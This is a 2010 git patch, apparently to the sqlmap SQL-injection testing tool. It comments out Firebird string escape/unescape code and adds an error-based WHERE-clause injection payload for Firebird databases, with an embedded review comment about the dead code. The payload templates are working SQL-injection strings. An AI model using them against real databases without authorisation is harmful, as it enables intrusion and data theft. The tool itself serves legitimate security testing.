From bf09b8a6d98e240f901d6ad493b5b3f94215164e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 2 Dec 2010 15:09:21 +0000
Subject: [PATCH] added Firebird error based (WHERE) attack vector
---
plugins/dbms/firebird/syntax.py | 78 +++++++++++++++++----------------
xml/payloads.xml | 21 ++++++++-
2 files changed, 61 insertions(+), 38 deletions(-)
diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index c489c78df..eccabf456 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -15,59 +15,63 @@ class Syntax(GenericSyntax):
 def __init__(self):
 GenericSyntax.__init__(self)
+ # As ASCII_CHAR is only available from v2.1 we'll need to adapt this one to use the
+ # commented-out part only if detected version>=2.1
+ # Reference: wiki.firebirdsql.org/wiki/index.php?page=ASCII_CHAR
+
 @staticmethod
 def unescape(expression, quote=True):
- if quote:
- while True:
- index = expression.find("'")
- if index == -1:
- break
+ #if quote:
+ #while True:
+ #index = expression.find("'")
+ #if index == -1:
+ #break
- firstIndex = index + 1
- index = expression[firstIndex:].find("'")
+ #firstIndex = index + 1
+ #index = expression[firstIndex:].find("'")
- if index == -1:
- raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
+ #if index == -1:
+ #raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
- lastIndex = firstIndex + index
- old = "'%s'" % expression[firstIndex:lastIndex]
- unescaped = ""
+ #lastIndex = firstIndex + index
+ #old = "'%s'" % expression[firstIndex:lastIndex]
+ #unescaped = ""
- for i in range(firstIndex, lastIndex):
- unescaped += "ASCII_CHAR(%d)" % (ord(expression[i]))
- if i < lastIndex - 1:
- unescaped += "||"
+ #for i in range(firstIndex, lastIndex):
+ #unescaped += "ASCII_CHAR(%d)" % (ord(expression[i]))
+ #if i < lastIndex - 1:
+ #unescaped += "||"
- expression = expression.replace(old, unescaped)
- else:
- unescaped = "".join("ASCII_CHAR(%d)||" % ord(c) for c in expression)
- if unescaped[-1] == "||":
- unescaped = unescaped[:-1]
+ #expression = expression.replace(old, unescaped)
+ #else:
+ #unescaped = "".join("ASCII_CHAR(%d)||" % ord(c) for c in expression)
+ #if unescaped[-1] == "||":
+ #unescaped = unescaped[:-1]
- expression = unescaped
+ #expression = unescaped
 return expression
 @staticmethod
 def escape(expression):
- while True:
- index = expression.find("ASCII_CHAR(")
- if index == -1:
- break
+ #while True:
+ #index = expression.find("ASCII_CHAR(")
+ #if index == -1:
+ #break
- firstIndex = index
- index = expression[firstIndex:].find(")")
+ #firstIndex = index
+ #index = expression[firstIndex:].find(")")
- if index == -1:
- raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
+ #if index == -1:
+ #raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
- lastIndex = firstIndex + index + 1
- old = expression[firstIndex:lastIndex]
- oldUpper = old.upper()
- oldUpper = oldUpper.lstrip("ASCII_CHAR(").rstrip(")")
- oldUpper = oldUpper.split("||")
+ #lastIndex = firstIndex + index + 1
+ #old = expression[firstIndex:lastIndex]
+ #oldUpper = old.upper()
+ #oldUpper = oldUpper.lstrip("ASCII_CHAR(").rstrip(")")
+ #oldUpper = oldUpper.split("||")
- escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
- expression = expression.replace(old, escaped).replace("'||'", "")
+ #escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
+ #expression = expression.replace(old, escaped).replace("'||'", "")
 return expression
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 8902fae7f..e28516a41 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -704,9 +704,28 @@ Formats: Oracle
+
+
+ Firebird error-based - WHERE clause
+ 2
+ 1
+ 0
+ 1
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
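Review bot: Both `unescape` and `escape` now return `expression` untouched while their whole former bodies survive as `#`-prefixed lines, which leaves `quote` as an unused parameter of `unescape` and roughly forty lines of dead code that nothing compiles or tests. The comment added above `unescape` already states the intended rule (the ASCII_CHAR() path only on Firebird >= 2.1), so it should be expressed as a real branch on the detected backend version with the original body beneath it, e.g. `if <detected Firebird version, placeholder> >= (2, 1):`, and `escape` needs the same gate rather than a separate commented-out copy. Until that lands, each method should carry a docstring saying the pass-through is deliberate, e.g. `"""Return expression unchanged; ASCII_CHAR() unescaping is disabled until a Firebird >= 2.1 version check is wired in."""`, so callers do not assume string literals are still being rewritten. Both method bodies lie entirely within this hunk; the `class Syntax` header named in the hunk header and the rest of the file do not.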
+ Firebird +
+